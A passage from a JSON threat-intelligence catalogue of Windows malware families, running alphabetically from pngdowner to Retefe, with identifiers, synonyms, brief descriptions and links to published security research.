[] }, "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", "value": "pngdowner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", "http://blogs.360.cn/post/APT_C_01_en.html", "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" ], "synonyms": [ "pivy", "poisonivy" ], "type": [] }, "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", "value": "Poison Ivy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom", "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" ], "synonyms": [], "type": [] }, "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", "value": "Polyglot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", "https://github.com/nyx0/Pony" ], "synonyms": [ "Fareit", "Siplog" ], "type": [] }, "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", "value": "Pony" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" ], "synonyms": [], "type": [] }, "uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", "value": "PoohMilk Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time", "https://twitter.com/malwrhunterteam/status/806595092177965058" ], "synonyms": [], "type": [] }, "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", "value": "Popcorn Time" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.portless", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf" ], "synonyms": [], "type": [] }, "uuid": "b813cb80-28ff-4713-abdc-e9a22d397bb4", "value": "portless" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer", "http://pages.arbornetworks.com/rs/arbor/images/ASERT%20Threat%20Intelligence%20Brief%202014-06%20Uncovering%20PoS%20Malware%20and%20Attack%20Campaigns.pdf" ], "synonyms": [], "type": [] }, "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", "value": "poscardstealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks_dropper", "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" ], "synonyms": [], "type": [] }, "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", "value": "Poweliks Dropper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" ], "synonyms": [], "type": [] }, "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", "value": "PowerDuke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool", "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" ], "synonyms": [], "type": [] }, "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b", "value": "PowerPool" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", "https://lokalhost.pl/gozi_tree.txt" ], "synonyms": [], "type": [] }, "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", "value": "Powersniff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [], "type": [] }, "uuid": "606f778a-8b99-4880-8da8-b923651d627b", "value": "PowerRatankba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor", "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" ], "synonyms": [], "type": [] }, "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886", "value": "prb_backdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator", "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/" ], "synonyms": [], "type": [] }, "uuid": "54041c03-5714-4247-9226-3c801f59bc07", "value": "Predator The Thief" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka", "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" ], "synonyms": [], "type": [] }, "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f", "value": "Prikorma" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex", "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502", "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/" ], "synonyms": [], "type": [] }, "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705", "value": "Prilex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker", "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/", "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/", "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/" ], "synonyms": [], "type": [] }, "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", "value": "PrincessLocker" }, { "description": "According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", "https://twitter.com/mesa_matt/status/1035211747957923840" ], "synonyms": [], "type": [] }, "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9", "value": "PsiX" }, { "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss", "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/" ], "synonyms": [ "PSS" ], "type": [] }, "uuid": "e437f01c-8040-4098-a3fa-20154b58c928", "value": "PC Surveillance System" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" ], "synonyms": [], "type": [] }, "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf", "value": "Pteranodon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat", "http://blog.alyac.co.kr/1853", "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" ], "synonyms": [], "type": [] }, "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26", "value": "PubNubRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos", "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" ], "synonyms": [], "type": [] }, "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", "value": "Punkey POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://github.com/n1nj4sec/pupy" ], "synonyms": [], "type": [] }, "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", "value": "pupy" }, { "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo", "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/", "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", "https://www.secureworks.com/research/pushdo", "http://malware-traffic-analysis.net/2017/04/03/index2.html" ], "synonyms": [], "type": [] }, "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155", "value": "Pushdo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow" ], "synonyms": [], "type": [] }, "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228", "value": "Putabmow" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e", "value": "PvzOut" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos", "https://twitter.com/physicaldrive0/status/573109512145649664", "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/", "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html" ], "synonyms": [], "type": [] }, "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab", "value": "pwnpos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa", "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", "https://www.youtube.com/watch?v=HfSQlC76_s4" ], "synonyms": [], "type": [] }, "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2", "value": "Pykspa" }, { "description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" ], "synonyms": [ "Locky Locker" ], "type": [] }, "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490", "value": "PyLocky" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel" ], "synonyms": [], "type": [] }, "uuid": "f4980a75-f72c-4925-8ff5-118b32dd5eaa", "value": "Qaccel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf", "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/" ], "synonyms": [], "type": [] }, "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb", "value": "Qadars" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", "http://contagiodump.blogspot.com/2010/11/template.html", "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html" ], "synonyms": [ "Pinkslipbot", "Qbot" ], "type": [] }, "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549", "value": "QakBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" ], "synonyms": [ "Tolouge" ], "type": [] }, "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c", "value": "QHost" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/" ], "synonyms": [ "qtproject" ], "type": [] }, "uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222", "value": "QtBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quant_loader", "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/" ], "synonyms": [], "type": [] }, "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", "value": "Quant Loader" }, { "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/quasar/QuasarRAT/tree/master/Client", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", "https://twitter.com/malwrhunterteam/status/789153556255342596", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments" ], "synonyms": [], "type": [] }, "uuid": "05252643-093b-4070-b62f-d5836683a9fa", "value": "Quasar RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980", "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/" ], "synonyms": [], "type": [] }, "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", "value": "r980" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant", "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" ], "synonyms": [], "type": [] }, "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c", "value": "Radamant" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat", "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/" ], "synonyms": [], "type": [] }, "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", "value": "RadRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rakhni", "https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/" ], "synonyms": [], "type": [] }, "uuid": "cf6887d9-3d68-4f89-9d61-e97dcc4d8c20", "value": "Rakhni" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", "https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor" ], "synonyms": [ "brebsd" ], "type": [] }, "uuid": "805b99d1-233d-4f7f-b343-440e5d507494", "value": "Rambo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo" ], "synonyms": [], "type": [] }, "uuid": "51f53823-d289-4176-af45-3fca7eda824b", "value": "Ramdo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", "https://research.checkpoint.com/ramnits-network-proxy-servers/", "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf" ], "synonyms": [ "Nimnul" ], "type": [] }, "uuid": "542161c0-47a4-4297-baca-5ed98386d228", "value": "Ramnit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/", "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/" ], "synonyms": [], "type": [] }, "uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846", "value": "Ranbyus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam", "http://blog.talosintel.com/2016/07/ranscam.html" ], "synonyms": [], "type": [] }, "uuid": "50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b", "value": "Ranscam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc", "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles" ], "synonyms": [], "type": [] }, "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", "value": "Ransoc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock", "https://forum.malekal.com/viewtopic.php?t=36485&start=", "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2" ], "synonyms": [ "WinLock" ], "type": [] }, "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c", "value": "Ransomlock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", "https://twitter.com/malwrhunterteam/status/997748495888076800", "https://twitter.com/malwrhunterteam/status/977275481765613569" ], "synonyms": [], "type": [] }, "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5", "value": "Rapid Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer", "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html" ], "synonyms": [], "type": [] }, "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", "value": "RapidStealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" ], "synonyms": [], "type": [] }, "uuid": "e0a1407f-2595-4bd2-ba16-2c6d9be4e066", "value": "rarstar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratabankapos", "http://blog.trex.re.kr/3", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [], "type": [] }, "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", "value": "RatabankaPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" ], "synonyms": [], "type": [] }, "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", "value": "RawPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", "https://www.f-secure.com/documents/996508/1030745/callisto-group", "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" ], "synonyms": [ "Crisis", "Remote Control System" ], "type": [] }, "uuid": "c359c74e-4155-4e66-a344-b56947f75119", "value": "RCS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv", "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf" ], "synonyms": [], "type": [] }, "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", "value": "rdasrv" }, { "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot", "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under", "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/", "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html" ], "synonyms": [], "type": [] }, "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f", "value": "ReactorBot" }, { "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" ], "synonyms": [], "type": [] }, "uuid": "826c31ca-2617-47e4-b236-205da3881182", "value": "Reaver" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha", "https://www.recordedfuture.com/redalpha-cyber-campaigns/" ], "synonyms": [], "type": [] }, "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", "value": "RedAlpha" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "http://blog.macnica.net/blog/2017/12/post-8c22.html", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" ], "synonyms": [], "type": [] }, "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", "value": "RedLeaves" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redyms", "https://www.welivesecurity.com/2013/02/04/what-do-win32redyms-and-tdl4-have-in-common/" ], "synonyms": [], "type": [] }, "uuid": "36893c2a-28ad-4dd3-a66b-906f1dd15b92", "value": "Redyms" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert", "https://twitter.com/JaromirHorejsi/status/816237293073797121" ], "synonyms": [], "type": [] }, "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618", "value": "Red Alert" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler", "http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf" ], "synonyms": [], "type": [] }, "uuid": "ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7", "value": "Red Gambler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg", "https://sensepost.com/discover/tools/reGeorg/", "https://github.com/sensepost/reGeorg" ], "synonyms": [], "type": [] }, "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad", "value": "reGeorg" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin", "https://www.youtube.com/watch?v=jeLd-gw2bWo" ], "synonyms": [], "type": [] }, "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb", "value": "Regin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "http://malware-traffic-analysis.net/2017/12/22/index.html", "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", "https://secrary.com/ReversingMalware/RemcosRAT/" ], "synonyms": [], "type": [] }, "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2", "value": "Remcos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" ], "synonyms": [], "type": [] }, "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada", "value": "Remexi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" ], "synonyms": [], "type": [] }, "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9", "value": "Remsec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy" ], "synonyms": [], "type": [] }, "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c", "value": "Remy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom", "https://www.coresecurity.com/sites/default/files/resources/2017/03/Behind_Malware_Infection_Chain.pdf" ], "synonyms": [], "type": [] }, "uuid": "a1f137d4-298f-4761-935d-bd39ab898479", "value": "Rerdom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup", "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/" ], "synonyms": [], "type": [] }, "uuid": "42fa55e3-e708-4c11-b807-f31573639941", "value": "Retadup" }, { "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows 